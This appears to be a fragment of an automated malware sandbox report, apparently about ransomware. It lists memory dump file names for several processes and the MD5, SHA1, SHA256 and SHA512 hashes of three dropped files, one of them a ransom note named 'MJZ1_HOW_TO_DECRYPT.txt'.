memory/2784-157-0x0000000000000000-mapping.dmp
memory/1208-158-0x0000000000000000-mapping.dmp
memory/532-159-0x0000000000000000-mapping.dmp
memory/4028-160-0x0000000000000000-mapping.dmp
memory/2876-161-0x0000000000000000-mapping.dmp
memory/2916-162-0x0000000000000000-mapping.dmp
memory/700-163-0x0000000000000000-mapping.dmp
memory/3200-164-0x0000000000000000-mapping.dmp
memory/3624-165-0x0000000000000000-mapping.dmp
memory/384-166-0x0000000000000000-mapping.dmp
memory/3552-167-0x0000000000000000-mapping.dmp
memory/3700-168-0x0000000000000000-mapping.dmp
memory/1496-169-0x0000000000000000-mapping.dmp
memory/1616-170-0x0000000000000000-mapping.dmp
memory/1792-171-0x0000000000000000-mapping.dmp
memory/1968-172-0x0000000000000000-mapping.dmp
memory/2844-173-0x0000000000000000-mapping.dmp
memory/2132-174-0x0000000000000000-mapping.dmp
memory/2064-175-0x0000000000000000-mapping.dmp
memory/1912-176-0x0000000000000000-mapping.dmp
memory/2572-177-0x0000000000000000-mapping.dmp
memory/2168-178-0x0000000000000000-mapping.dmp
memory/3360-180-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-179-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-181-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-182-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-183-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-184-0x000002C6707A0000-0x000002C6707C2000-memory.dmp
memory/3360-185-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-186-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-187-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-189-0x000002C66E6C3000-0x000002C66E6C5000-memory.dmp
memory/3360-188-0x000002C66E6C0000-0x000002C66E6C2000-memory.dmp
memory/3360-190-0x000002C670950000-0x000002C6709C6000-memory.dmp
memory/3360-191-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-195-0x000002C66E6C6000-0x000002C66E6C8000-memory.dmp
memory/3360-196-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-197-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-217-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-218-0x000002C654880000-0x000002C654882000-memory.dmp
memory/3360-219-0x000002C66E6C8000-0x000002C66E6C9000-memory.dmp
memory/376-221-0x000001F913410000-0x000001F913412000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/376-222-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-223-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-224-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-225-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-226-0x000001F92F310000-0x000001F92F332000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c04b250c767ef07d7d81c047de230cfb |
| SHA1 | bd00117691187fb87be9d6f01e708f9482def050 |
| SHA256 | a660e9d5c4a65352646e3acf2e4d4d093b76f3a9bd0b2d64f82e1d99a865c7f2 |
| SHA512 | 12f9417a4456059873348a9090146e03da911493fea4294f35da7d54750b7c169359d1de0935fd993338b6a0118ff1f8462c41dee4e5389fea0ff911616b3666 |
memory/376-228-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-229-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-230-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-231-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-232-0x000001F92F4C0000-0x000001F92F536000-memory.dmp
memory/376-233-0x000001F913410000-0x000001F913412000-memory.dmp
memory/376-258-0x000001F913423000-0x000001F913425000-memory.dmp
memory/376-257-0x000001F913420000-0x000001F913422000-memory.dmp
memory/376-259-0x000001F913426000-0x000001F913428000-memory.dmp
memory/376-262-0x000001F913428000-0x000001F913429000-memory.dmp
C:\MJZ1_HOW_TO_DECRYPT.txt
| MD5 | d85393db6cedc9369965984426e05044 |
| SHA1 | cc3016496d70f0ad8a25c46f8059346ab9034d6c |
| SHA256 | a49351af5ac89e7d32d6354806c4890c23b08e36e2904b6ba41c5a5691d8a36f |
| SHA512 | 4e412a8df230688e6abefa78a2f59938f1146ad51073a10336c222201499382d1c25da448bfbc814065aae0fe0569a16037cb38e41373f46adf2b004e49894f1 |